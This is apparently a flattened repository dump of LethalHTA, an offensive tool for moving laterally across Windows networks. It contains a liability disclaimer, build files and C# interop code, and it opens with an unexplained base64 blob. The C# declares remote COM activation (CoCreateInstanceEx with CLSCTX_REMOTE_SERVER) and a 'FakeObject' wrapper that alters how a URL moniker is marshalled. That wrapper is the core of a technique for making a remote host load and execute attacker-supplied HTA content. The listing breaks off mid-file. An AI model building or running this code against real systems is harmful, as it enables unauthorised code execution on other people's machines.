w/Lf457Vh9L0IJDq5P6tVRxyiStwFF69uGaP02ap9aDfHSUe1z9mCM4wLm0dpnCzaGpl20saSyoKkShFstFDgNszK0N6qlMUso5Rhu0RgeR94KJqCx1K9FBlUdZZlUFtuTLhsV765kqmqgtE6hCjCy9W5mKpSB6LcrkWqllQpLE2OljKh4XeIkhVajPth1ogdLu0FUPtpe8gSxwiYYoI/dD4+Qvi4gzcsAM5A0T6zNaVWB+oLSvAZWHkKaV60F+k3z7v+aPY2EHRFpjhfvfFBc1iDS/y3dG1K61xz+Wgn+klVGs6NkTwcXL2I6WOo3FPu+qCuhfAdMV4v9ulgAFNzSURb4YE+02binLNAo7anoNQs0a2C/b/kITKPPdQKzxiaDm4A8+D2DzDAEpCkmQMYVCMgGVh6AgDRlSdhNQN4E5EcFZHP4n1FAmtX7S9rZlljVi6xaChL9p5SvkHrjSEm2MIsmHgrDhiXWD0/6upbi40iHWTaBLosKn+aTbwQ5OPj8/m0LU76/MjLg9PBe
GXlBoohsu9KhZqmMDMQZBDqqI5u3OnLsgfPVkc0BbBgyyjG8zzoyX4s7cxpgzh6MmXIcoudPA4a1XcgSqwXWNaQBF7VdyDq2XUjQ+XLZ8DHtP8XUNVvXZxIcKA/BknliGe0DtmXjOMULd1MvDdGkguPNMuKLPjLHGNrvuzFJG3qi0XiC1Ug0rI4SDV7xGxRJ21qf1TprGNW6i6HpDDIDoWmxWmdfAU03sPIQaLq6WtcyJf/jUws/x4RcfsByvqE3tSTswZfmzBzcyPIcZNkc5mckSzCMhO5i1nWab18tb/vqVwlAMePTr4BKmu8+VIpuAKpYuOuKSWB1wtd6chfiwKVO+ZWkd7yi24g9rokrhr6C0xzHUMCxbLtJV4s4do3EYuAl6A52AdklnQq0XvcA2bL4UnJKR3uAxvGPZNJ1sfZiWaWnbfrcA2TLqgp9PQnScNnvPE+bTMgCeYy85lHgPuczlvpLoiffxEVZbB6hNfYwWz5WxhgtD19s1shov/VzPVZJX5sScQ0lkbeNBVlbFNeCmfuuNPa8L9D6+PeMZtb7uA16GWGNVfdbLTVX/hjWN4da4pI9F2IXnQE3MPMQiqmyMlMnKfAs+c6gWzH1Soqpzb+P9HzFVLvGU5adPydgCU+k6L0qAruGIrhVlHMySK9w/Xn40hbljnkFdNnAygOgS7v6m7RrJ51SdhRIN93EfCgc84cBkO+M2CMCL+S58JXbFXtzignoNTHk0EvIzZHd30MA9OPhX57Ex3L/WAbO/gc= -------------------------------------------------------------------------------- /DISCLAIMER.md: -------------------------------------------------------------------------------- 1 | ### DISCLAIMER 2 | 3 | You expressly understand and agree that LethalHTA (creators and contributors) shall not be liable for any damages or losses resulting from your use of this tool or third-party products that use it. 4 | 5 | Creators aren't in charge of any and have/has no responsibility for any kind of: 6 | 7 | * Unlawful or illegal use of the tool 8 | * Legal or Law infringement (acted in any country, state, municipality, place) by third parties and users 9 | * Act against ethical and / or human moral, ethic, and peoples and cultures of the world 10 | * Malicious act, capable of causing damage to third parties, promoted or distributed by third parties or the user through this tool 11 | 12 | ### Contact 13 | 14 | Feel free to contact info@code-white.com for any questions. 
15 | -------------------------------------------------------------------------------- /DotNet/.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /DotNet/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 
125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 
159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. 
Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27703.2035 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LethalHTADotNet", "LethalHTADotNet\LethalHTADotNet.csproj", "{7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | 
GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|x64.ActiveCfg = Debug|x64 19 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|x64.Build.0 = Debug|x64 20 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|x64.ActiveCfg = Release|x64 23 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {CD0B0F55-ED35-4755-9EC8-C885ADC0FCE8} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/ComUtils.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace LethalHTADotNet 4 | { 5 | /* Interop helpers shared by the project: a GUID-to-pointer helper, the CLSCTX flags, the MULTI_QI and COSERVERINFO layouts, and P/Invoke imports of CreateURLMonikerEx (urlmon.dll) and CoCreateInstanceEx (ole32.dll). */ public static class ComUtils 6 | { 7 | /* Unmanaged copy of the IID_IUnknown GUID, created once when the type is initialised. */ public static IntPtr IID_IUnknownPtr = GuidToPointer("00000000-0000-0000-C000-000000000046"); 8 | 9 | /* Parses guid, copies its 16 bytes into a freshly allocated CoTaskMem buffer and returns the buffer pointer. No matching free is visible in this listing, so the buffer stays allocated. A malformed string makes the Guid constructor throw. */ public static IntPtr GuidToPointer(string guid) 10 | { 11 | Guid g = new Guid(guid); 12 | 13 | IntPtr ret = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(16); 14 | System.Runtime.InteropServices.Marshal.Copy(g.ToByteArray(), 0, ret, 16); 15 | 16 | return ret; 17 | } 18 | 19 | /* Execution-context flags passed as dwClsCtx to CoCreateInstanceEx; the names and values follow the Windows CLSCTX enumeration. */ [Flags] 20 | public enum CLSCTX : uint 21 | { 22 | CLSCTX_INPROC_SERVER = 0x1, 23 |
CLSCTX_INPROC_HANDLER = 0x2, 24 | CLSCTX_LOCAL_SERVER = 0x4, 25 | CLSCTX_INPROC_SERVER16 = 0x8, 26 | /* The only flag this project passes (see LethalHTA.pwn): activation on another machine. */ CLSCTX_REMOTE_SERVER = 0x10, 27 | CLSCTX_INPROC_HANDLER16 = 0x20, 28 | CLSCTX_RESERVED1 = 0x40, 29 | CLSCTX_RESERVED2 = 0x80, 30 | CLSCTX_RESERVED3 = 0x100, 31 | CLSCTX_RESERVED4 = 0x200, 32 | CLSCTX_NO_CODE_DOWNLOAD = 0x400, 33 | CLSCTX_RESERVED5 = 0x800, 34 | CLSCTX_NO_CUSTOM_MARSHAL = 0x1000, 35 | CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000, 36 | CLSCTX_NO_FAILURE_LOG = 0x4000, 37 | CLSCTX_DISABLE_AAA = 0x8000, 38 | CLSCTX_ENABLE_AAA = 0x10000, 39 | CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000, 40 | CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000, 41 | CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000, 42 | CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, 43 | CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER, 44 | CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER 45 | } 46 | 47 | /* urlmon.dll import. The int return value is the raw HRESULT; the moniker created for pszDisplayName is returned through ppmk. */ [System.Runtime.InteropServices.DllImport("urlmon.dll")] 48 | public static extern int CreateURLMonikerEx( 49 | IntPtr punk, 50 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string pszDisplayName, 51 | out IMoniker ppmk, 52 | uint flags 53 | ); 54 | 55 | /* Managed layout of one MULTI_QI entry for CoCreateInstanceEx: pointer to the requested IID, the returned interface, and the per-interface HRESULT. */ [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)] 56 | public struct MULTI_QI 57 | { 58 | public IntPtr pIID; 59 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.Interface)] 60 | public object pItf; 61 | public int hr; 62 | } 63 | 64 | /* Managed layout of COSERVERINFO; pwszName carries the name of the machine on which the class is to be activated, pAuthInfo optional authentication settings. */ [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)] 65 | public class COSERVERINFO 66 | { 67 | public uint dwReserved1; 68 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 69 | public string pwszName; 70 | public IntPtr pAuthInfo; 71 | public uint dwReserved2; 72 | } 73 | 74 | /* ole32.dll import. It is declared with a void return, so the function's own HRESULT is discarded; callers can only inspect the hr field of each pResults entry. */ [System.Runtime.InteropServices.DllImport("ole32.dll")] 75 | public static extern
void CoCreateInstanceEx( 76 | [System.Runtime.InteropServices.In, System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPStruct)] Guid rclsid, 77 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.IUnknown)] object pUnkOuter, 78 | CLSCTX dwClsCtx, 79 | COSERVERINFO pServerInfo, 80 | uint cmq, 81 | [System.Runtime.InteropServices.In, System.Runtime.InteropServices.Out] MULTI_QI[] pResults); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/FakeObject.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace LethalHTADotNet 5 | { 6 | /* COM-visible wrapper that implements both IMarshal and IMoniker. Every IMarshal call is forwarded to the IMarshal interface of the moniker given to the constructor; every IMoniker member of this class throws NotImplementedException. */ [ComVisible(true)] 7 | class FakeObject : IMarshal, IMoniker 8 | { 9 | /* Forwarding target for all IMarshal calls. */ private IMarshal _marshal; 10 | 11 | /* Keeps the supplied moniker, cast to IMarshal, as the forwarding target. The cast fails with InvalidCastException when the moniker does not expose IMarshal. */ public FakeObject(IMoniker moniker) 12 | { 13 | this._marshal = (IMarshal)moniker; 14 | } 15 | 16 | /* Forwards to the wrapped IMarshal but passes the constant 1 as destination context; the caller's dwDestContext is ignored. NOTE(review): 1 appears to correspond to MSHCTX_NOSHAREDMEM in the Windows MSHCTX enumeration - confirm against the SDK headers. */ public void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid) 17 | { 18 | _marshal.GetUnmarshalClass(riid, pv, 1, pvDestContext, MSHLFLAGS, out pCid); 19 | } 20 | 21 | /* Same forwarding as GetUnmarshalClass: destination context fixed to 1, all other arguments passed through. */ public void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize) 22 | { 23 | _marshal.GetMarshalSizeMax(riid, pv, 1, pvDestContext, MSHLFLAGS, out pSize); 24 | } 25 | 26 | /* Writes the marshal data to pstm through the wrapped IMarshal, again with the destination context fixed to 1 instead of the caller's value. */ public void MarshalInterface([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS) 27 | { 28 | _marshal.MarshalInterface(pstm, riid, pv, 1, pvDestContext, MSHLFLAGS); 29 | } 30 | 31 | /* Forwards unchanged to the wrapped IMarshal. */ public void UnmarshalInterface([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] ref Guid riid,
out IntPtr ppv) 32 | { 33 | _marshal.UnmarshalInterface(pstm, ref riid, out ppv); 34 | } 35 | 36 | public void ReleaseMarshalData([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm) 37 | { 38 | _marshal.ReleaseMarshalData(pstm); 39 | } 40 | 41 | public void DisconnectObject([In] uint dwReserved) 42 | { 43 | _marshal.DisconnectObject(dwReserved); 44 | } 45 | 46 | 47 | public int GetClassID(out Guid pClassID) 48 | { 49 | throw new NotImplementedException(); 50 | } 51 | 52 | public int IsDirty() 53 | { 54 | throw new NotImplementedException(); 55 | } 56 | 57 | public void Load([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm) 58 | { 59 | throw new NotImplementedException(); 60 | } 61 | 62 | public void Save([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] int fClearDirty) 63 | { 64 | throw new NotImplementedException(); 65 | } 66 | 67 | public void GetSizeMax([MarshalAs(UnmanagedType.LPArray), Out] ULARGE_INTEGER[] pcbSize) 68 | { 69 | throw new NotImplementedException(); 70 | } 71 | 72 | public void BindToObject([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riidResult, [MarshalAs(UnmanagedType.IUnknown)] out object ppvResult) 73 | { 74 | throw new NotImplementedException(); 75 | } 76 | 77 | public void BindToStorage([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvObj) 78 | { 79 | throw new NotImplementedException(); 80 | } 81 | 82 | public void Reduce([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In] uint dwReduceHowFar, [In, MarshalAs(UnmanagedType.Interface), Out] ref IMoniker 
ppmkToLeft, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkReduced) 83 | { 84 | throw new NotImplementedException(); 85 | } 86 | 87 | public void ComposeWith([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkRight, [In] int fOnlyIfNotGeneric, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkComposite) 88 | { 89 | throw new NotImplementedException(); 90 | } 91 | 92 | public void Enum([In] int fForward, [MarshalAs(UnmanagedType.Interface)] out System.Runtime.InteropServices.ComTypes.IEnumMoniker ppenumMoniker) 93 | { 94 | throw new NotImplementedException(); 95 | } 96 | 97 | public void IsEqual([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOtherMoniker) 98 | { 99 | throw new NotImplementedException(); 100 | } 101 | 102 | public void Hash(out uint pdwHash) 103 | { 104 | throw new NotImplementedException(); 105 | } 106 | 107 | public int IsRunning([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkNewlyRunning) 108 | { 109 | throw new NotImplementedException(); 110 | } 111 | 112 | public void GetTimeOfLastChange([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPArray), Out] FILETIME[] pFileTime) 113 | { 114 | throw new NotImplementedException(); 115 | } 116 | 117 | public void Inverse([MarshalAs(UnmanagedType.Interface)] out IMoniker ppmk) 118 | { 119 | throw new NotImplementedException(); 120 | } 121 | 122 | public void CommonPrefixWith([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkPrefix) 123 | { 124 | throw new NotImplementedException(); 125 | } 126 | 127 | public void RelativePathTo([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker 
ppmkRelPath) 128 | { 129 | throw new NotImplementedException(); 130 | } 131 | 132 | public void GetDisplayName([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPWStr)] out string ppszDisplayName) 133 | { 134 | throw new NotImplementedException(); 135 | } 136 | 137 | public void ParseDisplayName([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In, MarshalAs(UnmanagedType.LPWStr)] string pszDisplayName, out uint pchEaten, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkOut) 138 | { 139 | throw new NotImplementedException(); 140 | } 141 | 142 | public void IsSystemMoniker(out uint pdwMksys) 143 | { 144 | throw new NotImplementedException(); 145 | } 146 | 147 | 148 | } 149 | } 150 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/Interfaces.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | using System.Runtime.InteropServices.ComTypes; 5 | 6 | namespace LethalHTADotNet 7 | { 8 | public struct FILETIME 9 | { 10 | public int dwLowDateTime; 11 | public int dwHighDateTime; 12 | } 13 | 14 | public struct ULARGE_INTEGER 15 | { 16 | public ulong QuadPart; 17 | } 18 | 19 | [ComImport] 20 | [Guid("0000010C-0000-0000-C000-000000000046")] 21 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 22 | public interface IPersist 23 | { 24 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 25 | int GetClassID(out Guid pClassID); 26 | } 27 | 28 | [ComImport] 29 | [Guid("00000109-0000-0000-C000-000000000046")] 30 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 31 | public interface IPersistStream : IPersist 32 | 
{ 33 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 34 | new int GetClassID(out Guid pClassID); 35 | 36 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 37 | int IsDirty(); 38 | 39 | [MethodImpl(MethodImplOptions.InternalCall)] 40 | void Load([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm); 41 | 42 | [MethodImpl(MethodImplOptions.InternalCall)] 43 | void Save([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] int fClearDirty); 44 | 45 | [MethodImpl(MethodImplOptions.InternalCall)] 46 | void GetSizeMax([Out] [MarshalAs(UnmanagedType.LPArray)] ULARGE_INTEGER[] pcbSize); 47 | } 48 | 49 | [ComImport] 50 | [Guid("0000000F-0000-0000-C000-000000000046")] 51 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 52 | public interface IMoniker : IPersistStream 53 | { 54 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 55 | new int GetClassID(out Guid pClassID); 56 | 57 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 58 | new int IsDirty(); 59 | 60 | [MethodImpl(MethodImplOptions.InternalCall)] 61 | new void Load([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm); 62 | 63 | [MethodImpl(MethodImplOptions.InternalCall)] 64 | new void Save([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] int fClearDirty); 65 | 66 | [MethodImpl(MethodImplOptions.InternalCall)] 67 | new void GetSizeMax([Out] [MarshalAs(UnmanagedType.LPArray)] ULARGE_INTEGER[] pcbSize); 68 | 69 | [MethodImpl(MethodImplOptions.InternalCall)] 70 | void BindToObject([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riidResult, [MarshalAs(UnmanagedType.IUnknown)] out object ppvResult); 71 | 72 | [MethodImpl(MethodImplOptions.InternalCall)] 73 | void BindToStorage([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, 
